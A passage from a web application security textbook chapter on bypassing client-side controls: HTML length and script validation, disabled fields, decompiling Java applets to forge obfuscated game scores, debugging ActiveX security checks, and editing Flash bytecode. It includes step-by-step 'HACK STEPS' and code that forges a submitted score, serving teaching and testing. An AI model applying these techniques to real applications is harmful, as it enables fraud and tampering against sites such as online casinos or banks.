106 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 106

</form>

Here, the browser will prevent the user from entering any more than three

characters into the input field, and so the server-side application may assume

that the quantity parameter it receives will be no longer than this. However,

the restriction can be easily circumvented either by intercepting the request

containing the form submission to enter an arbitrary value, or by intercepting

the response containing the form to remove the

maxlength attribute.

INTERCEPTING RESPONSES

When you are attempting to intercept and modify server responses, you may

find that the relevant message displayed in your proxy looks like this:

HTTP/1.1 304 Not Modified

Date: Wed, 21 Feb 2007 22:40:20 GMT

Etag: “6c7-5fcc0900”

Expires: Thu, 22 Feb 2007 00:40:20 GMT

Cache-Control: max-age=7200

This response arises because the browser already possesses a cached copy

of the resource it requested. When the browser requests a cached resource, it

typically adds two additional headers to the request, called If-Modified-

Since and If-None-Match:

GET /scripts/validate.js HTTP/1.1

Host: wahh-app.com

If-Modified-Since: Sat, 17 Feb 2007 19:48:20 GMT

If-None-Match: “6c7-5fcc0900”

These headers tell the server the time at which the browser last updated its

cached copy, and the Etag string, which the server provided with that copy of

the resource. The Etag is a kind of serial number that the server assigns to

each cacheable resource and that it updates each time the resource is

modified. If the server possesses a newer version of the resource than the date

specified in the If-Modified-Since header, or if the Etag of the current

version does match the one specified in the If-None-Match header, then the

server will respond with the latest version of the resource. Otherwise, it will

return a 304 response as shown here, informing the browser that the resource

has not been modified and that the browser should use its cached copy.

When this occurs, and you need to intercept and modify the resource that

the browser has cached, you can intercept the relevant request and remove the

If-Modified-Since and If-None-Match headers, causing the server to

respond with the full version of the requested resource. Burp Proxy contains an

option to strip these headers from every request, thereby overriding all cache

information sent by the browser.

Chapter 5 ■ Bypassing Client-Side Controls 107

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 107

HACK STEPS

■ Look for form elements containing a maxlength attribute. Submit data

that is longer than this length but that is validly formatted in other

respects (e.g., is numeric if the application is expecting a number).

■ If the application accepts the overlong data, you may infer that the

client-side validation is not replicated on the server.

■ Depending on the subsequent processing that the application performs

on the parameter, you may be able to leverage the defects in validation

to exploit other vulnerabilities such as SQL injection, cross-site scripting,

or buffer overflows.

Script-Based Validation

The input validation mechanisms built into HTML forms themselves are

extremely simple, and are insufficiently fine-grained to perform relevant vali-

dation of many kinds of input. For example, a user registration form might

contain fields for name, email address, telephone number, and ZIP code, all of

which expect different types of input. It is therefore very common to see cus-

tomized client-side input validation implemented within scripts. Consider the

following variation on the original example:

function ValidateForm(theForm)

{

var isInteger = /^\d+$/

if(!isInteger.test(theForm.quantity.value))

{

alert(“Please enter a valid quantity”);

return false;

}

return true;

}

</script>

<form action=”order.asp” method=”post” onsubmit=”return

ValidateForm(this)“>

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size=”2” name=”quantity”>

</form>

The onsubmit attribute of the form tag instructs the browser to execute the

ValidateForm function when the user clicks the submit button and to submit the

form only if this function returns true. This mechanism enables the client-side

108 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 108

logic to intercept an attempted form submission, perform customized validation

checks on the user’s input, and decide whether to accept that input accordingly.

In the above example, the validation is extremely simple and checks whether the

data entered in the amount field is an integer.

Client-side controls of this kind are usually trivial to circumvent, and it is

normally sufficient to disable JavaScript within the browser. If this is done, the

onsubmit attribute is ignored, and the form is submitted without any custom

validation.

However, disabling JavaScript altogether may break the application if it

depends upon client-side scripting for its normal operation (such as construct-

ing parts of the user interface). A neater approach is to enter a benign value

into the input field in the browser, and then intercept the validated submission

with your proxy and modify the data to your desired value.

Alternatively, you can intercept the server’s response that contains the

JavaScript validation routine and modify the script to neutralize its effect — in

the previous example, by changing the

ValidateForm function to return true in

every case.

HACK STEPS

■ Identify any cases where client-side JavaScript is used to perform input

validation prior to form submission.

■ Submit data to the server that the validation would ordinarily have

blocked, either by modifying the submission request to inject invalid

data or by modifying the form validation code to neutralize it.

■ As with length restrictions, determine whether the client-side controls

are replicated on the server, and if not, whether this can be exploited for

any malicious purpose.

■ Note that if multiple input fields are subjected to client-side validation

prior to form submission, you need to test each field individually with

invalid data, while leaving valid values in all of the other fields. If you

submit invalid data in multiple fields simultaneously, it is possible that

the server will stop processing the form when it identifies the first invalid

field, and so your testing is not reaching all possible code paths within

the application.

NOTE Client-side JavaScript routines to validate user input are extremely

common in web applications but do not infer that every such application is

vulnerable. The application is exposed only if client-side validation is not

replicated on the server, and even then only if crafted input that circumvents

client-side validation can be used to cause some undesirable behavior by the

application.

Chapter 5 ■ Bypassing Client-Side Controls 109

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 109

In the majority of cases, client-side validation of user input has beneficial

effects on the application’s performance and the quality of the user experience.

For example, when filling out a detailed registration form, an ordinary user

might make various mistakes, such as omitting required fields or formatting

their telephone number incorrectly. In the absence of client-side validation,

correcting these mistakes may entail several reloads of the page, and round-

trip messages to the server. Implementing basic validation checks on the client

side makes the user’s experience much smoother and reduces the load on the

server.

Disabled Elements

If an element on an HTML form is flagged as disabled, it appears on-screen but

is usually grayed out and is not editable or usable in the way an ordinary con-

trol is. Also, it is not sent to the server when the form is submitted. For exam-

ple, consider the following form:

<p>Product: <input disabled=”true” name=”product” value=”Sony VAIO

A217S”></p>

<p>Quantity: <input size=”2” name=”quantity”>

</form>

This includes the name of the product as a disabled text field and appears on-

screen as shown in Figure 5-5.

Figure 5-5: A form containing a disabled input field

The behavior of this form is identical to the original example: the only para-

meters submitted are

quantity and price. However, the presence of a dis-

abled field suggests that this parameter may originally have been used by the

application. Earlier versions of the form may have included a hidden or

editable field containing the product name. This would have been submitted

to the server and may have been processed by the application. Modifying the

name of the product may not appear to be as promising an attack as modify-

ing its price. However, if this parameter is processed, then it may be vulnera-

ble to many kinds of bugs such as SQL injection or cross-site scripting, which

are of interest to an attacker.

110 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 110

HACK STEPS

■ Look for disabled elements within each form of the application. When-

ever one is found, try submitting it to the server along with the form’s

other parameters, to determine whether it has any effect.

■ Often, submit elements are flagged as disabled so that buttons appear as

grayed out in contexts when the relevant action is not available. You

should always try to submit the names of these elements, to determine

whether the application performs a server-side check before attempting

to carry out the requested action.

■ Note that browsers do not include disabled form elements when forms

are submitted, and so you will not identify these if you simply walk

through the application’s functionality monitoring the requests issued by

the browser. To identify disabled elements, you need to monitor the

server’s responses or view the page source in your browser. You can also

use the automated “find and replace” function of your intercepting proxy

to remove occurrences of the disabled attribute within input tags. See

Chapter 19 for details of this feature.

Capturing User Data: Thick-Client Components

Besides HTML forms, the other main method for capturing, validating, and

submitting user data is to use a thick-client component. The technologies you

are most likely to encounter here are Java applets, ActiveX controls, and

Shockwave Flash objects.

Thick-client components can capture data in various different ways, both via

input forms and in some cases by interacting with the client operating system’s

file system or registry. They can perform arbitrarily complex validation and

manipulation of captured data prior to submission to the server. Further,

because their internal workings are less transparently visible than HTML forms

and JavaScript, developers are more likely to assume that the validation they

perform cannot be circumvented. For this reason, thick-client components are

often a fruitful means of discovering vulnerabilities within web applications.

NOTE Whatever validation and processing a thick-client component performs,

if it submits data to the server in a transparent manner, then this data can be

modified using an intercepting proxy in just the same way as described for HTML

form data. For example, a thick-client component supporting an authentication

mechanism might capture user credentials, perform some validation on these,

and submit the values to the server as plaintext parameters within the request.

The validation can be trivially circumvented without performing any analysis or

attack on the component itself.

Chapter 5 ■ Bypassing Client-Side Controls 111

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 111

Thick-client components present a more interesting and challenging target

when the data they capture is obfuscated in some manner before being

transmitted to the server. In this situation, modifying the submitted values

will typically break the obfuscation and so will be rejected by the server.

To circumvent the validation, it is necessary to look inside the thick-client

component itself, understand the validation and obfuscation it performs,

and subvert its processing in some way so as to achieve your objective.

Java Applets

Java applets are a popular choice of technology for implementing thick-client

components because they are cross-platform and they run in a sandboxed

environment which mitigates against various kinds of security problems that

can afflict more heavyweight thick-client technologies.

As a result of running in a sandbox, Java applets cannot normally access

operating system resources such as the file system. Hence, their main use as a

client-side control is to capture user input or other in-browser information.

Consider the following extract of HTML source, which loads a Java applet con-

taining a game:

function play()

{

alert(“you scored “ + TheApplet.getScore());

document.location = “submitScore.jsp?score=” +

TheApplet.getObsScore() + “&name=” +

document.playForm.yourName.value;

}

</script>

<p>Enter name: <input type=”text” name=”yourName” value=”“></p>

</form>

<applet code=”https://wahh-game.com/JavaGame.class”

id=”TheApplet”></applet>

In this code, the applet tag instructs the browser to load a Java applet from

the specified URL and instantiate it with the name

TheApplet. When the user

clicks the Play button, a JavaScript routine executes that invokes the

getScore

method of the applet. This is when the actual game play takes place, after which

the score is displayed in an alert dialog. The script then invokes the

getObsScore

method of the applet, and submits the returned value as a parameter to the

submitScore.jsp URL, together with the name entered by the user.

112 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 112

For example, playing the game results in a dialog like the one shown in Fig-

ure 5-6, followed by a request for a URL with this form:

https://wahh-game.com/submitScore.jsp?score=

c1cc3139323c3e4544464d51515352585a61606a6b&name=daf

which generates an entry in the high-scores table with a value of 38.

Figure 5-6: A dialog produced when

the applet-based game is played

It appears, therefore, that the long string that is returned by the getObsScore

method, and submitted in the score parameter, contains an obfuscated repre-

sentation of your score. If you want to cheat the game and submit an arbitrary

high score, you will need to figure out a way of correctly obfuscating your cho-

sen score, so that it is decoded in the normal way by the server.

One approach you may consider is to harvest a large number of scores

together with their obfuscated equivalents, and attempt to reverse engineer

the obfuscation algorithm. However, suppose that you play the game several

times, always scoring 38 and observe the following values being submitted:

bb58303981393b424d4a5059575c616a676d72757b818683

5f48303981393b41474951585861606a656f6f7377817f828b

fd20303981393b4149495651555c66686a6c73797680848489

370c303981393b42494a505359606361696e76787b828584

b5bc303981393b454549545a5a5e6365656971717d818388

1744303981393b43464d515a585f5f646b6f7477767f7e86

f3d4303981393b494a4b5653556162616e6d6f7577827e

de08303981393b474a4d5357595b5d69676a7178757b

da40303981393b43464b54545b6060676e6d70787e7b7e85

1aec303981393b434d4b5054556266646c6b6e717a7f80

Each time you submit a score of 38, a portion of the obfuscated string

remains constant, but the majority of it changes in unpredictable ways. You

find that if you modify any of the obfuscated score, it is rejected by the server.

Attempting to reverse engineer the algorithm based on observed values could

be a very difficult task.

Chapter 5 ■ Bypassing Client-Side Controls 113

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 113

NOTE The idea of attacking a Java-based game to submit an arbitrary score

may appear frivolous. However, thick-client components are employed by many

casino web sites, which play for real money. Posting an arbitrary score to an

application like this may be a very serious business!

Decompiling Java Bytecode

A much more promising approach is to decompile the applet to obtain its

source code. Languages like Java are not compiled into native machine

instructions, but to an intermediate language called bytecode, which is inter-

preted at runtime by a virtual machine. Normally, Java bytecode can be

decompiled to recover its original source code without too many problems.

To decompile a client-side applet, you first need to save a copy of it to disk.

You can do this simply by using your browser to request the URL specified in

the

code attribute of the applet tag shown previously.

There are various tools available that can decompile Java bytecode. The fol-

lowing example shows partial output from one such tool, Jad:

E:\>jad.exe JavaGame.class

Parsing JavaGame.class... Generating JavaGame.jad

E:\>type JavaGame.jad

// Jad home page: http://www.kpdus.com/jad.html

// Decompiler options: packimports(3)

// Source File Name: JavaGame.java

import java.applet.Applet;

import java.awt.Graphics;

public class JavaGame extends Applet

{

public int getScore()

{

play();

return score;

}

public String getObsScore()

{

return obfuscate(Integer.toString(score) + “|” +

Double.toString(Math.random()));

}

public static String obfuscate(String input)

{

114 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 114

return hexEncode(checksum(input) + scramble(input));

}

private static String scramble(String input)

{

StringBuffer output = new StringBuffer();

for(int i = 0; i < input.length(); i++)

output.append((char)((input.charAt(i) - 3) + i * 4));

return output.toString();

}

private static String checksum(String input)

{

char checksum = ‘\0’;

for(int i = 0; i < input.length(); i++)

{

checksum ^= input.charAt(i);

checksum <<= ‘\002’;

}

return new String(new char[] {

(char)(checksum / 256), (char)(checksum % 256)

});

}

...

NOTE For various reasons, Jad sometimes does not do a perfect job of

decompiling bytecode, and you may need to tidy up some of its output before it

can be recompiled.

With access to this source code, you can immediately see how your score is

converted into a long obfuscated string that has the characteristics observed.

The applet first appends some random data to your score (separated by the

pipe character). It takes a checksum of the resulting string, and also scrambles

it. It then prepends the checksum to the scrambled string and finally hex-

encodes the result for safe transmission within a URL parameter.

The addition of some random data accounts for the length and unpre-

dictability of the obfuscated string, and the addition of a checksum explains

why changing any part of the obfuscated string causes the server-side decoder

to reject it.

Having decompiled the applet back to its source code, there are various

ways in which you could leverage this to bypass the client-side controls and

submit an arbitrary high score to the server:

■■

You can modify the decompiled source to change the behavior of the

applet, recompile it to bytecode, and modify the source code of the

Chapter 5 ■ Bypassing Client-Side Controls 115

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 115

HTML page to load the modified applet in place of the original. For

example, you could change the

getObsScore method to:

return obfuscate(“99999|0.123456789”);

To recompile your modified code, you should use the Java compiler

javac provided with Sun’s Java SDK.

■■

You can add a main method to the decompiled source to provide the

functionality to obfuscate arbitrary inputs:

public static void main(String[] args)

{

System.out.println(obfuscate(args[0]));

}

You can then run the recompiled byte code from the command line to

obfuscate any score you like:

E:\>java JavaGame “99999|0.123456789“

6ca4363a3e42468d45474e53585d62676c7176

■■

You can review the public methods exposed by the applet to determine

whether any of them can be leveraged to achieve your objectives with-

out actually modifying the applet. In the present case, you can see that

the

obfuscate method is marked as public, meaning that you can call it

directly from JavaScript with arbitrary input. Hence, you can submit

your chosen score simply by modifying the source code of the HTML

page as follows:

function play()

{

alert(“you scored “ + TheApplet.getScore());

document.location = “submitScore.jsp?score=” +

TheApplet.obfuscate(“99999|0.123456789”) + “&name=” +

document.playForm.yourName.value;

}

TIP Often, Java applets are packed up as JAR (Java ARchive) files, which

contain multiple class files and other resources such as sounds and images.

JAR files are really just ZIP archives with the .jar file extension. You can

unpack and repack them using standard archive readers like WinRar or WinZip,

and also using the Jar tool, which is included in Sun’s Java SDK.

TIP Other useful tools for analyzing and manipulating Java applets are Jode

(a decompiler and bytecode obfuscator) and JSwat (a Java debugger).

116 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 116

HACK STEPS

■ Review all calls made to an applet’s methods, and determine whether

data returned from the applet is being submitted to the server.

■ If that data is transparent in nature (i.e., is not obfuscated or encrypted),

probe and attack the server’s processing of the submitted data in the

same way as for any other parameter.

■ If the data is opaque, decompile the applet to obtain its source code.

■ Review the relevant source code (starting with the implementation of the

method that returns the opaque data) to understand what processing is

being performed.

■ Determine whether the applet contains any public methods that can be

used to perform the relevant obfuscation on arbitrary input.

■ If not, modify and recompile the applet’s source in such a way as to neu-

tralize any validation it performs or allow you to obfuscate arbitrary

input.

■ Then, submit various suitably obfuscated attack strings to the server to

probe for vulnerabilities, as you would for any other parameter.

Coping with Bytecode Obfuscation

Because of the ease with which Java bytecode can be decompiled to recover its

source, various techniques have been developed to obfuscate the bytecode

itself. Applying these techniques results in bytecode that is harder to decom-

pile or that decompiles to misleading or invalid source code that may be very

difficult to understand and impossible to recompile without substantial effort.

For example:

package myapp.interface;

import myapp.class.public;

import myapp.interface.else.class;

import myapp.throw.throw;

import if.if.if.if.else;

import if.if.if.if.if;

import java.awt.event.KeyEvent;

public class double extends public implements strict

{

public double(j j1)

{

_mthif();

_fldif = j1;

Chapter 5 ■ Bypassing Client-Side Controls 117

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 117

}

private void _mthif(ActionEvent actionevent)

{

_mthif(((KeyEvent) (null)));

switch(_fldif._mthnew()._fldif)

{

case 0:

_fldfloat.setEnabled(false);

_fldboolean.setEnabled(false);

_fldinstanceof.setEnabled(false);

_fldint.setEnabled(false);

break;

case 3:

_fldfloat.setEnabled(true);

_fldboolean.setEnabled(true);

_fldinstanceof.setEnabled(false);

_fldint.setEnabled(false);

break;

...

The obfuscation techniques commonly employed are as follows:

■■

Meaningful class, method, and member variable names are replaced

with meaningless expressions like a, b, c. This forces the reader of

decompiled code to identify the purpose of each item by studying how

it is used, and can make it very difficult to keep track of different items

while tracing them through the source code.

■■

Going further, some obfuscators replace item names with Java key-

words such as

new and int. Although this technically renders the byte-

code illegal, most JVMs will tolerate the illegal code and it will execute

normally. However, even if a decompiler can handle the illegal byte-

code, the resulting source code will be even less readable than that

described in the previous point. More importantly, the source will not

be recompilable without extensive reworking to rename illegally named

items in a consistent manner.

■■

Many obfuscators strip unnecessary debug and meta-information from

the bytecode, including source file names and line numbers (which

makes stack traces less informative), local variable names (which frus-

trates debugging), and inner class information (which stops reflection

from working properly).

■■

Redundant code may be added that creates and manipulates various

kinds of data in significant-looking ways but that is autonomous from

the real data actually being used by the application’s functionality.

■■

The path of execution through code can be modified in convoluted

ways, through the use of jump instructions, so that the logical sequence

118 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 118

of execution is hard to discern when reading through the decompiled

source.

■■

Illegal programming constructs may be introduced, such as unreach-

able statements, and code paths with missing return statements. Most

JVMs will tolerate these phenomena in bytecode, but the decompiled

source cannot be recompiled without correcting the illegal code.

HACK STEPS

Effective tactics for coping with bytecode obfuscation depend upon the

techniques used and the purpose for which you are analyzing the source. Here

are some suggestions:

■ You can review an applet for public methods without fully understanding

the source. It should be obvious which methods can be invoked from

JavaScript, and what their signatures are, enabling you to test the behav-

ior of the methods by passing in various inputs.

■ If class, method, and member variable names have been replaced with

meaningless expressions (but not Java keywords), then you can use the

refactoring functionality built into many IDEs to assist you in understand-

ing the code. By studying how items are used, you can start to assign

them meaningful names. If you use the “rename” tool within the IDE, it

will do a lot of work for you, tracing the use of the item throughout the

codebase and renaming it everywhere.

■ You can actually undo a lot of obfuscation by running the obfuscated

bytecode through an obfuscator a second time and choosing suitable

options. A useful obfuscator to use here is Jode, which can remove

redundant code paths added by another obfuscator, and facilitate the

process of understanding obfuscated names by assigning globally unique

names to items.

ActiveX Controls

ActiveX controls are a much more heavyweight technology than Java applets.

They are effectively native Win32 executables that, once accepted and installed

by the user, execute with the full privileges of that user and can carry out arbi-

trary actions, including interacting with the operating system.

ActiveX can be used to implement practically any client-side control,

including capturing user input and other in-browser data, and verifying that

the client computer meets certain security standards before allowing access to

some function.

From the point of view of HTML page source, ActiveX controls are instanti-

ated and invoked in a very similar way to Java applets. For example, if you

Chapter 5 ■ Bypassing Client-Side Controls 119

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 119

have installed the Adobe Acrobat plug-in for Internet Explorer, the following

code will display a dialog showing the version of Acrobat installed:

classid=”CLSID:4F878398-E58A-11D3-BEE9-00C04FA0D6BA”>

</object>

<form>

<input type=”button” value=”Show version”

onclick=JavaScript:alert(document.TheAxControl.AcrobatVersion)>

</form>

In addition to looking for code like this, you can easily identify instances

where an application attempts to install a new ActiveX control, because your

browser will present an alert asking for your permission to install it.

NOTE Poorly written ActiveX controls have been a major source of security

vulnerabilities in recent years, and unwitting users who install defective

controls often leave themselves open to full system compromise at the hands

of any malicious web site that invokes and exploits the control. In Chapter 12,

we describe how you can find and exploit common vulnerabilities in ActiveX

controls to attack other users of an application.

There are various techniques that can be used to circumvent client-side con-

trols implemented using ActiveX.

Reverse Engineering

Because ActiveX controls are typically written in native languages like C and

C++, they cannot be trivially decompiled back to source code in the way that

Java applets can be. Nevertheless, because all of the processing performed by

an ActiveX control occurs on the client computer, it is in principle possible for

a user on that computer to fully scrutinize and control that processing, thereby

circumventing any security functions that it implements.

Reverse engineering is a complex and advanced topic, which extends

beyond the scope of this book. However, there are some basic techniques that

even a relatively inexperienced reverse engineer can use to defeat the client-

side security mechanisms implemented within many ActiveX controls.

HACK STEPS

■

Rather than pursuing a full static disassembly of the component’s code, use

an intuitive GUI-based debugger to monitor and control its execution at run-

time. For example, OllyDbg is an accessible yet powerful debugger that can

be used to achieve many kinds of attacks on compiled software at runtime:

120 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 120

HACK STEPS (continued)

■ Identify the methods exported by the control and its subcomponents,

and also any interesting operating system functions which the control

imports — in particular, any cryptographic functions. Set breakpoints on

these functions within the debugger.

■ When a breakpoint is hit, review the call stack to identify any relevant

data being passed to the function — in particular, any user-supplied data

that is being subjected to validation. By tracing the path of this data,

attempt to understand the processing being performed on it.

■ It is often easy to use a debugger to subvert the execution path of a

process in useful ways — for example, by modifying the parameters on

the stack being passed as inputs to a function, modifying the EAX regis-

ter used to pass the return value back from a function, or rewriting key

instructions like comparisons and jumps to change the logic imple-

mented within a function. If possible, use these techniques to circumvent

validation controls, causing potentially malicious data to be accepted for

further processing.

■ If data validation is performed before further manipulation such as

encryption or obfuscation, you can exploit this separation by supplying

valid data to the control, and then intercept and modify the data after it

has passed the validation steps, so that your potentially malicious data is

appropriately manipulated before being transmitted to the server-side

application.

■ If you find a means of manually altering the control’s processing to

defeat the validation it is performing, you can automate the execution of

this attack either by modifying the control’s binary on-disk (OllyDbg has

a facility to update binaries to reflect changes you have made to its code

within the debugger) or by hooking into the target process at runtime,

using an instrumentation framework such as Microsoft Detours.

Chapter 5 ■ Bypassing Client-Side Controls 121

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 121

The following are some useful resources if you’d like to find out more about

reverse engineering and related topics:

■■

Reversing: Secrets of Reverse Engineering by Eldad Eilam

■■

Hacker Disassembling Uncovered by Kris Kaspersky

■■

The Art of Software Security Assessment by Mark Dowd, John McDonald,

and Justin Schuh

■■

www.acm.uiuc.edu/sigmil/RevEng

■■

www.uninformed.org/?v=1&a=7

Manipulating Exported Functions

As with Java applets, it may be possible to manipulate and repurpose an

ActiveX control’s processing solely by invoking methods that it exposes to the

browser through its normal interface.

ActiveX controls may expose numerous methods that the application never

actually invokes from HTML, which you may not be aware of without exam-

ining the control itself. COMRaider by iDefense is a useful tool that can dis-

play all of a control’s methods and their signatures, as shown in Figure 5-7.

Figure 5-7: COMRaider showing the methods exposed by an ActiveX control

HACK STEPS

■ Developers typically use meaningful names for ActiveX methods, and it

may be possible to identify useful methods simply from their names.

■ You can sometimes determine the purpose of a function by systemati-

cally invoking it with different inputs and monitoring both the visible

behavior of the control and its internal workings using your debugger.

122 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 122

Fixing Inputs Processed by Controls

A common use to which ActiveX controls are put is as a client-side control to

verify that the client computer complies with specific security standards before

access is granted to certain server-side functionality. For example, in an attempt

to mitigate against keylogging attacks, an online banking application may

install a control that checks for the presence of a virus scanner, and the operat-

ing system patch level, before permitting a user to log in to the application.

If you need to circumvent this type of client-side control, it is usually easy to

do. The ActiveX control will typically read various details from the local com-

puter’s file system and registry as input data for its checks. You can monitor

the information being read and feed arbitrary inputs into the control that com-

ply with its security checks.

The Filemon and Regmon tools originally developed by Sysinternals (and

now owned by Microsoft) enable you to monitor all of a process’s interaction

with the computer’s file system and registry. You can filter the tools’ output to

display only the activity of the process you are interested in. When an ActiveX

control is performing security checks on the client computer, you will typically

see it querying security-relevant files and registry keys, such as items created

by antivirus products, as shown in Figure 5-8.

Figure 5-8: Regmon being used to capture the registry access carried

out by an ActiveX control

In this situation, it is usually sufficient to manually create the relevant file or

registry key, to convince the control that the corresponding software is installed.

If for some reason you do not wish to interfere with the actual operating system,

Chapter 5 ■ Bypassing Client-Side Controls 123

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 123

you can achieve the same effect using the debugging or instrumentation tech-

niques described previously, to fix the data returned to the control by the rele-

vant file system or registry APIs.

Decompiling Managed Code

Occasionally, you may encounter thick-client components written in C#. As

with Java applets, these can normally be decompiled to recover the original

source code.

A useful tool for performing this task is .NET Reflector by Lutz Roeder (see

Figure 5-9).

Figure 5-9: The .NET Reflector tool being used to decompile an

ActiveX control written in C#

Similar code obfuscation issues can arise in relation to C# assemblies as arise

with Java bytecode.

Shockwave Flash Objects

Flash is very popular on the Internet. It is often used as a means of providing

increased interactivity in informational web sites, but it is also employed in

web applications. Some online stores have Flash-based user interfaces, and it

is often used in jukebox software such as Pandora radio. The most common

124 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 124

use of Flash in an application context is in online games. These vary in nature

from purely recreational games to serious casino functionality, where real

money is involved. Many such games have been targeted by correspondingly

recreational and serious attackers.

Given what we have observed about the fallible nature of client-side con-

trols, the idea of implementing an online gambling application using a thick-

client component that runs locally on a potential attacker’s machine is an

intriguing one. If any aspect of the game play is controlled within the Flash

component instead of by the server, an attacker could manipulate the game

with fine precision to improve odds, change the rules, or alter the scores sub-

mitted back to the server.

Like the other thick-client components examined, Flash objects are con-

tained within a compiled file that the browser downloads from the server and

executes in a virtual machine, which in this case is a Flash player implemented

in a browser plug-in. The SWF file contains bytecode that is interpreted by the

Flash VM (virtual machine), and as with Java bytecode, this can be decompiled

to recover the original ActionScript source code, using appropriate tools. An

alternative means of attack, which is often more effective, is to disassemble

and modify the bytecode itself, without actually fully decompiling it to source.

Flasm is a disassembler and assembler for SWF bytecode and can be used to

extract a human-readable representation of the bytecode from an SWF file and

then reassemble modified bytecode into a new SWF file:

C:\flash>flasm

Flasm 1.61 build May 31 2006

Usage: flasm [command] filename

Commands:

-d Disassemble SWF file to the console

-a Assemble Flasm project (FLM)

-u Update SWF file, replace Flasm macros

-b Assemble actions to __bytecode__ instruction or byte sequence

-z Compress SWF with zLib

-x Decompress SWF

Backups with $wf extension are created for altered SWF files.

To save disassembly or __bytecode__ to file, redirect it:

flasm -d foo.swf > foo.flm

flasm -b foo.txt > foo.as

Read flasm.html for more information.

Chapter 5 ■ Bypassing Client-Side Controls 125

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 125

The following example shows Flasm being used to extract a human-

readable representation of bytecode from an SWF file for a simple Flash-based

car racing game:

C:\flash>flasm racer.swf > racer.flm

C:\flash>more racer.flm

movie ‘racer.swf’ compressed // flash 7, total frames: 3, frame rate: 24

fps, 64

0x500 px

exportAssets

1 as ‘engineStart’

end // of exportAssets

exportAssets

2 as ‘engineLoop’

end // of exportAssets

frame 0

stop

push ‘car1’

getVariable

push ‘code’, ‘player’

setMember

push ‘totalLaps’, 10

setVariable

push ‘acceleration’, 1.9

setVariable

push ‘gravity’, 0.4

setVariable

push ‘speedDecay’, 0.96

setVariable

push ‘rotationStep’, 10

setVariable

push ‘maxSpeed’, 10

setVariable

push ‘backSpeed’, 1

setVariable

push ‘currentCheckpoint1’, 1

setVariable

push ‘currentLap1’, 0.0

setVariable

push ‘checkpoints’, 2

setVariable

push ‘currentLapTXT’, ‘1/10’

setVariable

end // of frame 0

frame 0

constants ‘car’, ‘code’, ‘player’, ‘speed’, ‘speedDecay’, ‘Key’,

‘isDown’, ‘

...

126 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 126

Here, you can immediately see various bytecode instructions that are of

interest to someone wishing to attack and modify the game. For example, you

could change the value of the

maxSpeed variable from 10 to something a bit

more competitive. After doing this, the modified disassembly can then be con-

verted back into bytecode in a new SWF file, as follows:

C:\flash>flasm –a racer.flm

racer.flm successfully assembled to racer.swf, 31212 bytes

The car should now virtually fly around the track (to make it literally fly,

you could try changing the

gravity variable!).

In the previous example, the functionality implemented within the Flash

object was sufficiently simple that an attacker could fundamentally reengineer

the object by inspecting the disassembled bytecode and changing a single vari-

able. In more complex Flash objects, this may not be possible, and it may be

necessary to recover the original source and review it in detail to discover how

the object works and where best to attack it. The Flare tool can be used to

decompile an SWF file back into the original ActionScript source:

C:\flash>flare racer.swf && more racer.flr

movie ‘racer.swf’ {

// flash 7, total frames: 3, frame rate: 24 fps, 640x500 px, compressed

frame 1 {

stop();

car1.code = ‘player’;

totalLaps = 10;

acceleration = 1.9;

gravity = 0.4

speedDecay = 0.96;

rotationStep = 10;

maxSpeed = 10;

backSpeed = 1;

currentCheckpoint1 = 1;

currentLap1 = 0;

checkpoints = 2;

currentLapTXT = ‘1/10’;

}

...

While modifying recreational games is usually straightforward and may be

fun for personal amusement and beating a coworker, the client-side controls

implemented within the Flash objects used by enterprise applications and

online casinos are typically better protected. As with Java, obfuscation tech-

niques have been devised in an attempt to hinder decompilation attacks. Two

available tools are ActionScript Obfuscator and Viewer Screwer, which can

change both meaningful variable names and text references into scrambled

sequences of letters, making the decompiled code harder to understand.

Chapter 5 ■ Bypassing Client-Side Controls 127

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 127

The tools described can be obtained from:

■■

Flasm — www.nowrap.de/flasm

■■

Flare — www.nowrap.de/flare

■■

ActionScript Obfuscator — www.genable.com/aso.html

■■

Viewer Screwer — www.debreuil.com/vs

HACK STEPS

■ Explore the functionality of the Flash object within your browser. Use an

intercepting proxy to monitor any requests made to the server, to under-

stand which actions are executed entirely within the client-side compo-

nent itself and which may involve some server-side processing and

controls.

■ Any time you see data being submitted to the server, determine whether

this is transparent in nature, or has been obfuscated or encrypted in

some way. If the former is the case, you can bypass any controls imple-

mented within the object by simply modifying this data directly.

■ If the data that the object submits is opaque in nature, use Flasm to dis-

assemble the object into human-readable bytecode, and use Flare to

decompile the object into ActionScript source.

■ As with decompiled Java applets, review the bytecode and source to

identify any attack points that will enable you to reengineer the Flash

object and bypass any controls implemented within it.

Handling Client-Side Data Securely

As you have seen, the core security problem with web applications arises

because client-side components and user input are outside of the server’s

direct control. The client, and all of the data received from it, is inherently

untrustworthy.

Transmitting Data via the Client

Many applications leave themselves exposed because they transmit critical

data such as product prices and discount rates via the client in an unsafe

manner.

If possible, applications should avoid transmitting this kind of data via the

